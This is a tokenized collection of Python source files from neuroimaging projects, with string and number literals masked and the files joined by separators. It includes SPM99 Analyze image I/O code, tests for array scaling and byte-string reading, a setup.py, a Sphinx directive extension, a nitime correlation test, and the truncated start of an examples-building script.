'''<STR_LIT>''' <EOL> if affine . shape != ( <NUM_LIT:4> , <NUM_LIT:4> ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> hdr = self . _structarr <EOL> RZS = affine [ : <NUM_LIT:3> , : <NUM_LIT:3> ] <EOL> Z = np . sqrt ( np . sum ( RZS * RZS , axis = <NUM_LIT:0> ) ) <EOL> T = affine [ : <NUM_LIT:3> , <NUM_LIT:3> ] <EOL> hdr [ '<STR_LIT>' ] [ : <NUM_LIT:3> ] = - T / Z + <NUM_LIT:1> <EOL> @ classmethod <EOL> def _get_checks ( klass ) : <EOL> checks = super ( Spm99AnalyzeHeader , klass ) . _get_checks ( ) <EOL> return checks + ( klass . _chk_origin , ) <EOL> @ staticmethod <EOL> def _chk_origin ( hdr , fix = False ) : <EOL> rep = Report ( HeaderDataError ) <EOL> origin = hdr [ '<STR_LIT>' ] [ <NUM_LIT:0> : <NUM_LIT:3> ] <EOL> dims = hdr [ '<STR_LIT>' ] [ <NUM_LIT:1> : <NUM_LIT:4> ] <EOL> if ( not np . any ( origin ) or <EOL> ( np . all ( origin > - dims ) and np . all ( origin < dims * <NUM_LIT:2> ) ) ) : <EOL> return hdr , rep <EOL> rep . problem_level = <NUM_LIT:20> <EOL> rep . problem_msg = '<STR_LIT>' <EOL> if fix : <EOL> rep . fix_msg = '<STR_LIT>' <EOL> return hdr , rep <EOL> class Spm99AnalyzeImage ( analyze . AnalyzeImage ) : <EOL> """<STR_LIT>""" <EOL> header_class = Spm99AnalyzeHeader <EOL> files_types = ( ( '<STR_LIT:image>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> has_affine = True <EOL> makeable = True <EOL> rw = have_scipy <EOL> @ classmethod <EOL> @ kw_only_meth ( <NUM_LIT:1> ) <EOL> def from_file_map ( klass , file_map , mmap = True ) : <EOL> '''<STR_LIT>''' <EOL> ret = super ( Spm99AnalyzeImage , klass ) . from_file_map ( file_map , <EOL> mmap = mmap ) <EOL> try : <EOL> matf = file_map [ '<STR_LIT>' ] . get_prepare_fileobj ( ) <EOL> except IOError : <EOL> return ret <EOL> with matf : <EOL> contents = matf . read ( ) <EOL> if len ( contents ) == <NUM_LIT:0> : <EOL> return ret <EOL> import scipy . io as sio <EOL> mats = sio . loadmat ( BytesIO ( contents ) ) <EOL> if '<STR_LIT>' in mats : <EOL> mat = mats [ '<STR_LIT>' ] <EOL> if mat . ndim > <NUM_LIT:2> : <EOL> warnings . warn ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> mat = mat [ : , : , <NUM_LIT:0> ] <EOL> ret . _affine = mat <EOL> elif '<STR_LIT:M>' in mats : <EOL> hdr = ret . _header <EOL> if hdr . default_x_flip : <EOL> ret . _affine = np . dot ( np . diag ( [ - <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] ) , mats [ '<STR_LIT:M>' ] ) <EOL> else : <EOL> ret . _affine = mats [ '<STR_LIT:M>' ] <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> to_111 = np . eye ( <NUM_LIT:4> ) <EOL> to_111 [ : <NUM_LIT:3> , <NUM_LIT:3> ] = <NUM_LIT:1> <EOL> ret . _affine = np . dot ( ret . _affine , to_111 ) <EOL> return ret <EOL> def to_file_map ( self , file_map = None ) : <EOL> '''<STR_LIT>''' <EOL> if file_map is None : <EOL> file_map = self . file_map <EOL> super ( Spm99AnalyzeImage , self ) . to_file_map ( file_map ) <EOL> mat = self . _affine <EOL> if mat is None : <EOL> return <EOL> import scipy . io as sio <EOL> hdr = self . _header <EOL> if hdr . default_x_flip : <EOL> M = np . dot ( np . diag ( [ - <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] ) , mat ) <EOL> else : <EOL> M = mat <EOL> from_111 = np . eye ( <NUM_LIT:4> ) <EOL> from_111 [ : <NUM_LIT:3> , <NUM_LIT:3> ] = - <NUM_LIT:1> <EOL> M = np . dot ( M , from_111 ) <EOL> mat = np . dot ( mat , from_111 ) <EOL> with file_map [ '<STR_LIT>' ] . get_prepare_fileobj ( mode = '<STR_LIT:wb>' ) as mfobj : <EOL> sio . savemat ( mfobj , { '<STR_LIT:M>' : M , '<STR_LIT>' : mat } , format = '<STR_LIT:4>' ) <EOL> load = Spm99AnalyzeImage . load <EOL> save = Spm99AnalyzeImage . instance_to_filename </s>
<s> """<STR_LIT>""" <EOL> from . . fileutils import read_zt_byte_strings <EOL> from numpy . testing import ( assert_almost_equal , <EOL> assert_array_equal ) <EOL> from nose . tools import ( assert_true , assert_false , assert_raises , <EOL> assert_equal , assert_not_equal ) <EOL> from . . tmpdirs import InTemporaryDirectory <EOL> def test_read_zt_byte_strings ( ) : <EOL> binary = b'<STR_LIT>' <EOL> with InTemporaryDirectory ( ) : <EOL> path = '<STR_LIT>' <EOL> fwrite = open ( path , '<STR_LIT:wb>' ) <EOL> fwrite . write ( binary ) <EOL> fwrite . close ( ) <EOL> fread = open ( path , '<STR_LIT:rb>' ) <EOL> assert_equal ( read_zt_byte_strings ( fread ) , [ b'<STR_LIT>' ] ) <EOL> assert_equal ( fread . tell ( ) , <NUM_LIT:9> ) <EOL> fread . seek ( <NUM_LIT:0> ) <EOL> assert_equal ( read_zt_byte_strings ( fread , <NUM_LIT:2> ) , <EOL> [ b'<STR_LIT>' , b'<STR_LIT>' ] ) <EOL> assert_equal ( fread . tell ( ) , <NUM_LIT> ) <EOL> fread . seek ( <NUM_LIT:0> ) <EOL> assert_raises ( ValueError , read_zt_byte_strings , fread , <NUM_LIT:3> ) <EOL> fread . seek ( <NUM_LIT:9> ) <EOL> assert_raises ( ValueError , read_zt_byte_strings , fread , <NUM_LIT:2> ) <EOL> fread . seek ( <NUM_LIT:0> ) <EOL> assert_equal ( read_zt_byte_strings ( fread , <NUM_LIT:2> , <NUM_LIT:4> ) , <EOL> [ b'<STR_LIT>' , b'<STR_LIT>' ] ) <EOL> fread . close ( ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import division , print_function , absolute_import <EOL> import numpy as np <EOL> from . . externals . six import BytesIO <EOL> from . . volumeutils import ( calculate_scale , scale_min_max , finite_range , <EOL> apply_read_scaling , array_to_file , array_from_file ) <EOL> from . . casting import type_info <EOL> from . . testing import suppress_warnings <EOL> from numpy . testing import ( assert_array_almost_equal , assert_array_equal ) <EOL> from nose . tools import ( assert_true , assert_equal , assert_raises , <EOL> assert_not_equal ) <EOL> DEBUG = True <EOL> def test_scale_min_max ( ) : <EOL> mx_dt = np . maximum_sctype ( np . float ) <EOL> for tp in np . sctypes [ '<STR_LIT>' ] + np . sctypes [ '<STR_LIT:int>' ] : <EOL> info = np . iinfo ( tp ) <EOL> imin = np . array ( info . min , dtype = mx_dt ) <EOL> imax = np . array ( info . max , dtype = mx_dt ) <EOL> value_pairs = ( <EOL> ( <NUM_LIT:0> , imax ) , <EOL> ( imin , <NUM_LIT:0> ) , <EOL> ( imin , imax ) , <EOL> ( <NUM_LIT:1> , <NUM_LIT:10> ) , <EOL> ( - <NUM_LIT:1> , - <NUM_LIT:1> ) , <EOL> ( <NUM_LIT:1> , <NUM_LIT:1> ) , <EOL> ( - <NUM_LIT:10> , - <NUM_LIT:1> ) , <EOL> ( - <NUM_LIT:100> , <NUM_LIT:10> ) ) <EOL> for mn , mx in value_pairs : <EOL> scale , inter = scale_min_max ( mn , mx , tp , True ) <EOL> if mx - mn : <EOL> assert_array_almost_equal , ( mx - inter ) / scale , imax <EOL> assert_array_almost_equal , ( mn - inter ) / scale , imin <EOL> else : <EOL> assert_equal , ( scale , inter ) , ( <NUM_LIT:1.0> , mn ) <EOL> if imin == <NUM_LIT:0> and mn < <NUM_LIT:0> and mx > <NUM_LIT:0> : <EOL> ( assert_raises , ValueError , <EOL> scale_min_max , mn , mx , tp , False ) <EOL> continue <EOL> scale , inter = scale_min_max ( mn , mx , tp , False ) <EOL> assert_equal , inter , <NUM_LIT:0.0> <EOL> if mn == <NUM_LIT:0> and mx == <NUM_LIT:0> : <EOL> assert_equal , scale , <NUM_LIT:1.0> <EOL> continue <EOL> sc_mn = mn / scale <EOL> sc_mx = mx / scale <EOL> assert_true , sc_mn >= imin <EOL> assert_true , sc_mx <= imax <EOL> if imin == <NUM_LIT:0> : <EOL> if mx > <NUM_LIT:0> : <EOL> assert_array_almost_equal , mx / scale , imax <EOL> else : <EOL> assert_array_almost_equal , mn / scale , imax <EOL> continue <EOL> if abs ( mx ) >= abs ( mn ) : <EOL> assert_array_almost_equal , mx / scale , imax <EOL> else : <EOL> assert_array_almost_equal , mn / scale , imin <EOL> def test_finite_range ( ) : <EOL> for in_arr , res in ( <EOL> ( [ [ - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] , [ np . inf , np . nan , - np . inf ] ] , ( - <NUM_LIT:1> , <NUM_LIT:1> ) ) , <EOL> ( np . array ( [ [ - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] , [ np . inf , np . nan , - np . inf ] ] ) , ( - <NUM_LIT:1> , <NUM_LIT:1> ) ) , <EOL> ( [ [ np . nan ] , [ np . nan ] ] , ( np . inf , - np . inf ) ) , <EOL> ( np . zeros ( ( <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ) ) + np . nan , ( np . inf , - np . inf ) ) , <EOL> ( [ [ - np . inf ] , [ np . inf ] ] , ( np . inf , - np . inf ) ) , <EOL> ( np . zeros ( ( <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ) ) + np . inf , ( np . inf , - np . inf ) ) , <EOL> ( [ [ np . nan , - <NUM_LIT:1> , <NUM_LIT:2> ] , [ - <NUM_LIT:2> , np . nan , <NUM_LIT:1> ] ] , ( - <NUM_LIT:2> , <NUM_LIT:2> ) ) , <EOL> ( [ [ np . nan , - np . inf , <NUM_LIT:2> ] , [ - <NUM_LIT:2> , np . nan , np . inf ] ] , ( - <NUM_LIT:2> , <NUM_LIT:2> ) ) , <EOL> ( [ [ - np . inf , <NUM_LIT:2> ] , [ np . nan , <NUM_LIT:1> ] ] , ( <NUM_LIT:1> , <NUM_LIT:2> ) ) , <EOL> ( [ [ np . nan , - np . inf , <NUM_LIT:2> ] , [ - <NUM_LIT:2> , np . nan , np . inf ] ] , ( - <NUM_LIT:2> , <NUM_LIT:2> ) ) , <EOL> ( [ np . nan ] , ( np . inf , - np . inf ) ) , <EOL> ( [ np . inf ] , ( np . inf , - np . inf ) ) , <EOL> ( [ - np . inf ] , ( np . inf , - np . inf ) ) , <EOL> ( [ np . inf , <NUM_LIT:1> ] , ( <NUM_LIT:1> , <NUM_LIT:1> ) ) , <EOL> ( [ - np . inf , <NUM_LIT:1> ] , ( <NUM_LIT:1> , <NUM_LIT:1> ) ) , <EOL> ( [ [ ] , [ ] ] , ( np . inf , - np . inf ) ) , <EOL> ( np . array ( [ [ - <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:2> , - <NUM_LIT:1> , <NUM_LIT:4> ] ] , dtype = np . int ) , ( - <NUM_LIT:3> , <NUM_LIT:4> ) ) , <EOL> ( np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] ] , dtype = np . uint ) , ( <NUM_LIT:0> , <NUM_LIT:4> ) ) , <EOL> ( [ <NUM_LIT:0.> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , ( <NUM_LIT:0> , <NUM_LIT:3> ) ) , <EOL> ( [ [ np . nan , - <NUM_LIT:1> - <NUM_LIT> , <NUM_LIT:2> ] , [ - <NUM_LIT:2> , np . nan , <NUM_LIT:1> + <NUM_LIT> ] ] , ( - <NUM_LIT:2> , <NUM_LIT:2> ) ) , <EOL> ( [ [ np . nan , - <NUM_LIT:1> , <NUM_LIT:2> - <NUM_LIT> ] , [ - <NUM_LIT:2> + <NUM_LIT> , np . nan , <NUM_LIT:1> ] ] , ( - <NUM_LIT:2> + <NUM_LIT> , <NUM_LIT:2> - <NUM_LIT> ) ) , <EOL> ) : <EOL> assert_equal ( finite_range ( in_arr ) , res ) <EOL> assert_equal ( finite_range ( in_arr , False ) , res ) <EOL> assert_equal ( finite_range ( in_arr , check_nan = False ) , res ) <EOL> has_nan = np . any ( np . isnan ( in_arr ) ) <EOL> assert_equal ( finite_range ( in_arr , True ) , res + ( has_nan , ) ) <EOL> assert_equal ( finite_range ( in_arr , check_nan = True ) , res + ( has_nan , ) ) <EOL> in_arr = np . array ( in_arr ) <EOL> flat_arr = in_arr . ravel ( ) <EOL> assert_equal ( finite_range ( flat_arr ) , res ) <EOL> assert_equal ( finite_range ( flat_arr , True ) , res + ( has_nan , ) ) <EOL> if in_arr . dtype . kind == '<STR_LIT:f>' : <EOL> c_arr = in_arr . astype ( np . complex ) <EOL> assert_equal ( finite_range ( c_arr ) , res ) <EOL> assert_equal ( finite_range ( c_arr , True ) , res + ( has_nan , ) ) <EOL> a = np . array ( [ [ <NUM_LIT:1.> , <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] ] ) . view ( [ ( '<STR_LIT>' , '<STR_LIT:f>' ) ] ) <EOL> assert_raises ( TypeError , finite_range , a ) <EOL> def test_calculate_scale ( ) : <EOL> npa = np . array <EOL> res = calculate_scale ( npa ( [ - <NUM_LIT:2> , - <NUM_LIT:1> ] , dtype = np . int8 ) , np . uint8 , True ) <EOL> assert_equal ( res , ( <NUM_LIT:1.0> , - <NUM_LIT> , None , None ) ) <EOL> res = calculate_scale ( npa ( [ - <NUM_LIT:2> , - <NUM_LIT:1> ] , dtype = np . int8 ) , np . uint8 , <NUM_LIT:0> ) <EOL> assert_equal ( res , ( - <NUM_LIT:1.0> , <NUM_LIT:0.0> , None , None ) ) <EOL> res = calculate_scale ( npa ( [ - <NUM_LIT:1> , <NUM_LIT:1> ] , dtype = np . int8 ) , np . uint8 , <NUM_LIT:1> ) <EOL> assert_equal ( res , ( <NUM_LIT:1.0> , - <NUM_LIT:1.0> , None , None ) ) <EOL> assert_raises ( ValueError , <EOL> calculate_scale , npa ( [ - <NUM_LIT:1> , <NUM_LIT:1> ] , dtype = np . int8 ) , np . uint8 , <NUM_LIT:0> ) <EOL> res = calculate_scale ( npa ( [ - <NUM_LIT:1> , <NUM_LIT:255> ] , dtype = np . int16 ) , np . uint8 , <NUM_LIT:1> ) <EOL> assert_not_equal ( res , ( <NUM_LIT:1.0> , - <NUM_LIT:1.0> , None , None ) ) <EOL> def test_a2f_mn_mx ( ) : <EOL> str_io = BytesIO ( ) <EOL> for out_type in ( np . int16 , np . float32 ) : <EOL> arr = np . arange ( <NUM_LIT:6> , dtype = out_type ) <EOL> arr_orig = arr . copy ( ) <EOL> array_to_file ( arr , str_io ) <EOL> data_back = array_from_file ( arr . shape , out_type , str_io ) <EOL> assert_array_equal ( arr , data_back ) <EOL> array_to_file ( arr , str_io , mn = <NUM_LIT:2> ) <EOL> data_back = array_from_file ( arr . shape , out_type , str_io ) <EOL> assert_array_equal ( arr , arr_orig ) <EOL> assert_array_equal ( data_back , [ <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] ) <EOL> array_to_file ( arr , str_io , mx = <NUM_LIT:4> ) <EOL> data_back = array_from_file ( arr . shape , out_type , str_io ) <EOL> assert_array_equal ( arr , arr_orig ) <EOL> assert_array_equal ( data_back , [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:4> ] ) <EOL> array_to_file ( arr , str_io , mn = <NUM_LIT:2> , mx = <NUM_LIT:4> ) <EOL> data_back = array_from_file ( arr . shape , out_type , str_io ) <EOL> assert_array_equal ( arr , arr_orig ) <EOL> assert_array_equal ( data_back , [ <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:4> ] ) <EOL> def test_a2f_nan2zero ( ) : <EOL> arr = np . array ( [ np . nan , <NUM_LIT> ] , dtype = np . float32 ) <EOL> str_io = BytesIO ( ) <EOL> array_to_file ( arr , str_io ) <EOL> data_back = array_from_file ( arr . shape , np . float32 , str_io ) <EOL> assert_array_equal ( np . isnan ( data_back ) , [ True , False ] ) <EOL> array_to_file ( arr , str_io , nan2zero = True ) <EOL> data_back = array_from_file ( arr . shape , np . float32 , str_io ) <EOL> assert_array_equal ( np . isnan ( data_back ) , [ True , False ] ) <EOL> with np . errstate ( invalid = '<STR_LIT:ignore>' ) : <EOL> array_to_file ( arr , str_io , np . int32 , nan2zero = True ) <EOL> data_back = array_from_file ( arr . shape , np . int32 , str_io ) <EOL> assert_array_equal ( data_back , [ <NUM_LIT:0> , <NUM_LIT> ] ) <EOL> with np . errstate ( invalid = '<STR_LIT:ignore>' ) : <EOL> array_to_file ( arr , str_io , np . int32 , nan2zero = False ) <EOL> data_back = array_from_file ( arr . shape , np . int32 , str_io ) <EOL> assert_array_equal ( data_back , [ np . array ( np . nan ) . astype ( np . int32 ) , <NUM_LIT> ] ) <EOL> def test_array_file_scales ( ) : <EOL> bio = BytesIO ( ) <EOL> for in_type , out_type , err in ( ( np . int16 , np . int16 , None ) , <EOL> ( np . int16 , np . int8 , None ) , <EOL> ( np . uint16 , np . uint8 , None ) , <EOL> ( np . int32 , np . int8 , None ) , <EOL> ( np . float32 , np . uint8 , None ) , <EOL> ( np . float32 , np . int16 , None ) ) : <EOL> out_dtype = np . dtype ( out_type ) <EOL> arr = np . zeros ( ( <NUM_LIT:3> , ) , dtype = in_type ) <EOL> info = type_info ( in_type ) <EOL> arr [ <NUM_LIT:0> ] , arr [ <NUM_LIT:1> ] = info [ '<STR_LIT>' ] , info [ '<STR_LIT>' ] <EOL> if not err is None : <EOL> assert_raises ( err , calculate_scale , arr , out_dtype , True ) <EOL> continue <EOL> slope , inter , mn , mx = calculate_scale ( arr , out_dtype , True ) <EOL> array_to_file ( arr , bio , out_type , <NUM_LIT:0> , inter , slope , mn , mx ) <EOL> bio . seek ( <NUM_LIT:0> ) <EOL> arr2 = array_from_file ( arr . shape , out_dtype , bio ) <EOL> arr3 = apply_read_scaling ( arr2 , slope , inter ) <EOL> max_miss = slope / <NUM_LIT> <EOL> assert_true ( np . all ( np . abs ( arr - arr3 ) <= max_miss ) ) <EOL> bio . truncate ( <NUM_LIT:0> ) <EOL> bio . seek ( <NUM_LIT:0> ) <EOL> def test_scaling_in_abstract ( ) : <EOL> for category0 , category1 in ( ( '<STR_LIT:int>' , '<STR_LIT:int>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:int>' ) , <EOL> ) : <EOL> for in_type in np . sctypes [ category0 ] : <EOL> for out_type in np . sctypes [ category1 ] : <EOL> check_int_a2f ( in_type , out_type ) <EOL> for category0 , category1 in ( ( '<STR_LIT:float>' , '<STR_LIT:int>' ) , <EOL> ( '<STR_LIT:float>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:int>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) : <EOL> for in_type in np . sctypes [ category0 ] : <EOL> for out_type in np . sctypes [ category1 ] : <EOL> with suppress_warnings ( ) : <EOL> check_int_a2f ( in_type , out_type ) <EOL> def check_int_a2f ( in_type , out_type ) : <EOL> big_floater = np . maximum_sctype ( np . float ) <EOL> info = type_info ( in_type ) <EOL> this_min , this_max = info [ '<STR_LIT>' ] , info [ '<STR_LIT>' ] <EOL> if not in_type in np . sctypes [ '<STR_LIT>' ] : <EOL> data = np . array ( [ this_min , this_max ] , in_type ) <EOL> if not np . all ( np . isfinite ( data ) ) : <EOL> if DEBUG : <EOL> print ( '<STR_LIT>' % in_type ) <EOL> return <EOL> else : <EOL> data = np . zeros ( ( <NUM_LIT:2> , ) , in_type ) <EOL> data [ <NUM_LIT:0> ] = this_min + <NUM_LIT> <EOL> data [ <NUM_LIT:1> ] = this_max + <NUM_LIT> <EOL> str_io = BytesIO ( ) <EOL> try : <EOL> scale , inter , mn , mx = calculate_scale ( data , out_type , True ) <EOL> except ValueError as e : <EOL> if DEBUG : <EOL> print ( in_type , out_type , e ) <EOL> return <EOL> array_to_file ( data , str_io , out_type , <NUM_LIT:0> , inter , scale , mn , mx ) <EOL> data_back = array_from_file ( data . shape , out_type , str_io ) <EOL> data_back = apply_read_scaling ( data_back , scale , inter ) <EOL> assert_true ( np . allclose ( big_floater ( data ) , big_floater ( data_back ) ) ) <EOL> scale32 = np . float32 ( scale ) <EOL> inter32 = np . float32 ( inter ) <EOL> if scale32 == np . inf or inter32 == np . inf : <EOL> return <EOL> data_back = array_from_file ( data . shape , out_type , str_io ) <EOL> data_back = apply_read_scaling ( data_back , scale32 , inter32 ) <EOL> info = type_info ( in_type ) <EOL> out_min , out_max = info [ '<STR_LIT>' ] , info [ '<STR_LIT>' ] <EOL> assert_true ( np . allclose ( big_floater ( data ) , <EOL> big_floater ( np . clip ( data_back , out_min , out_max ) ) ) ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> from os . path import join as pjoin <EOL> import sys <EOL> from functools import partial <EOL> if os . path . exists ( '<STR_LIT>' ) : <EOL> os . remove ( '<STR_LIT>' ) <EOL> if len ( set ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) ) . intersection ( sys . argv ) ) > <NUM_LIT:0> : <EOL> import setup_egg <EOL> from distutils . core import setup <EOL> from nisext . sexts import get_comrec_build , package_check , install_scripts_bat <EOL> cmdclass = { '<STR_LIT>' : get_comrec_build ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : install_scripts_bat } <EOL> ver_file = os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> exec ( open ( ver_file ) . read ( ) ) <EOL> if '<STR_LIT>' in sys . modules : <EOL> extra_setuptools_args = dict ( <EOL> tests_require = [ '<STR_LIT>' ] , <EOL> test_suite = '<STR_LIT>' , <EOL> zip_safe = False , <EOL> extras_require = dict ( <EOL> doc = '<STR_LIT>' , <EOL> test = '<STR_LIT>' ) , <EOL> ) <EOL> pkg_chk = partial ( package_check , setuptools_args = extra_setuptools_args ) <EOL> else : <EOL> extra_setuptools_args = { } <EOL> pkg_chk = package_check <EOL> pkg_chk ( '<STR_LIT>' , NUMPY_MIN_VERSION ) <EOL> custom_pydicom_messages = { '<STR_LIT>' : '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> } <EOL> pkg_chk ( '<STR_LIT>' , <EOL> PYDICOM_MIN_VERSION , <EOL> optional = '<STR_LIT>' , <EOL> messages = custom_pydicom_messages ) <EOL> def main ( ** extra_args ) : <EOL> setup ( name = NAME , <EOL> maintainer = MAINTAINER , <EOL> maintainer_email = MAINTAINER_EMAIL , <EOL> description = DESCRIPTION , <EOL> long_description = LONG_DESCRIPTION , <EOL> url = URL , <EOL> download_url = DOWNLOAD_URL , <EOL> license = LICENSE , <EOL> classifiers = CLASSIFIERS , <EOL> author = AUTHOR , <EOL> author_email = AUTHOR_EMAIL , <EOL> platforms = PLATFORMS , <EOL> version = VERSION , <EOL> requires = REQUIRES , <EOL> provides = PROVIDES , <EOL> packages = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> package_data = { '<STR_LIT>' : <EOL> [ pjoin ( '<STR_LIT>' , '<STR_LIT:data>' , '<STR_LIT:*>' ) , <EOL> pjoin ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:data>' , '<STR_LIT:*>' ) , <EOL> pjoin ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:data>' , '<STR_LIT:*>' ) , <EOL> pjoin ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:data>' , '<STR_LIT:*>' ) , <EOL> ] } , <EOL> scripts = [ pjoin ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> pjoin ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> pjoin ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> pjoin ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] , <EOL> cmdclass = cmdclass , <EOL> ** extra_args <EOL> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ** extra_setuptools_args ) </s>
<s> from docutils . nodes import Body , Element <EOL> from docutils . parsers . rst import directives <EOL> class only_base ( Body , Element ) : <EOL> def dont_traverse ( self , * args , ** kwargs ) : <EOL> return [ ] <EOL> class html_only ( only_base ) : <EOL> pass <EOL> class latex_only ( only_base ) : <EOL> pass <EOL> def run ( content , node_class , state , content_offset ) : <EOL> text = '<STR_LIT:\n>' . join ( content ) <EOL> node = node_class ( text ) <EOL> state . nested_parse ( content , content_offset , node ) <EOL> return [ node ] <EOL> def html_only_directive ( name , arguments , options , content , lineno , <EOL> content_offset , block_text , state , state_machine ) : <EOL> return run ( content , html_only , state , content_offset ) <EOL> def latex_only_directive ( name , arguments , options , content , lineno , <EOL> content_offset , block_text , state , state_machine ) : <EOL> return run ( content , latex_only , state , content_offset ) <EOL> def builder_inited ( app ) : <EOL> if app . builder . name == '<STR_LIT:html>' : <EOL> latex_only . traverse = only_base . dont_traverse <EOL> else : <EOL> html_only . traverse = only_base . dont_traverse <EOL> def setup ( app ) : <EOL> app . add_directive ( '<STR_LIT>' , html_only_directive , True , ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> app . add_directive ( '<STR_LIT>' , latex_only_directive , True , ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> app . add_node ( html_only ) <EOL> app . add_node ( latex_only ) <EOL> def visit_perform ( self , node ) : <EOL> pass <EOL> def depart_perform ( self , node ) : <EOL> pass <EOL> def visit_ignore ( self , node ) : <EOL> node . children = [ ] <EOL> def depart_ignore ( self , node ) : <EOL> node . children = [ ] <EOL> app . add_node ( html_only , html = ( visit_perform , depart_perform ) ) <EOL> app . add_node ( html_only , latex = ( visit_ignore , depart_ignore ) ) <EOL> app . add_node ( latex_only , latex = ( visit_perform , depart_perform ) ) <EOL> app . add_node ( latex_only , html = ( visit_ignore , depart_ignore ) ) </s>
<s> import numpy as np <EOL> import numpy . testing as npt <EOL> import nitime . timeseries as ts <EOL> import nitime . analysis as nta <EOL> def test_SeedCorrelationAnalyzer ( ) : <EOL> targ = ts . TimeSeries ( np . random . rand ( <NUM_LIT:10> , <NUM_LIT:10> ) , sampling_interval = <NUM_LIT:1> ) <EOL> seed = ts . TimeSeries ( np . random . rand ( <NUM_LIT:10> ) , sampling_interval = <NUM_LIT:1> ) <EOL> corr = nta . SeedCorrelationAnalyzer ( seed , targ ) <EOL> our_coef_array = corr . corrcoef <EOL> np_coef_array = np . array ( [ np . corrcoef ( seed . data , a ) [ <NUM_LIT:0> , <NUM_LIT:1> ] for a in targ . data ] ) <EOL> npt . assert_array_almost_equal ( our_coef_array , np_coef_array ) <EOL> seed = ts . TimeSeries ( np . random . rand ( <NUM_LIT:2> , <NUM_LIT:10> ) , sampling_interval = <NUM_LIT:1> ) <EOL> corr = nta . SeedCorrelationAnalyzer ( seed , targ ) <EOL> our_coef_array = corr . corrcoef <EOL> for source in [ <NUM_LIT:0> , <NUM_LIT:1> ] : <EOL> np_coef_array = np . array ( <EOL> [ np . corrcoef ( seed . data [ source ] , a ) [ <NUM_LIT:0> , <NUM_LIT:1> ] for a in targ . data ] ) <EOL> npt . assert_array_almost_equal ( our_coef_array [ source ] , np_coef_array ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> from glob import glob <EOL> import matplotlib <EOL> import matplotlib . pyplot as plt <EOL> from matplotlib . _pylab_helpers import Gcf <EOL> from toollib import * <EOL> matplotlib . use ( '<STR_LIT>' ) <EOL> examples_header = """<STR_LIT>""" <EOL> figure_basename = None <EOL> def show ( ) : <EOL> """<STR_LIT>""" <EOL> allfm = Gcf . get_all_fig_managers ( ) <EOL> for fcount , fm in enumerate ( allfm ) : <EOL> fm . canvas . figure . savefig ( '<STR_LIT>' % <EOL> ( figure_basename , fcount + <NUM_LIT:1> ) ) <EOL> _mpl_show = plt . show <EOL> plt . show = show <EOL> cd ( '<STR_LIT>' ) <EOL> if not os . getcwd ( ) . endswith ( '<STR_LIT>' ) : <EOL> raise OSError ( '<STR_LIT>' ) <EOL> sh ( '<STR_LIT>' ) <EOL> index = open ( '<STR_LIT>' , '<STR_LIT:w>' ) <EOL> index . write ( examples_header ) <EOL> for name in [ os . path . splitext ( f ) [ <NUM_LIT:0> ] for f in glob ( '<STR_LIT>' ) ] : <EOL> if name not in ( [ '<STR_LIT:index>' , '<STR_LIT>' ] ) : <EOL> index . write ( '<STR_LIT>' % name ) <EOL> index . close ( ) <EOL> if '<STR_LIT>' in sys . argv : <EOL> pass <EOL> else : <EOL> if not os . path . isdir ( '<STR_LIT>' ) : <EOL> os . mkdir ( 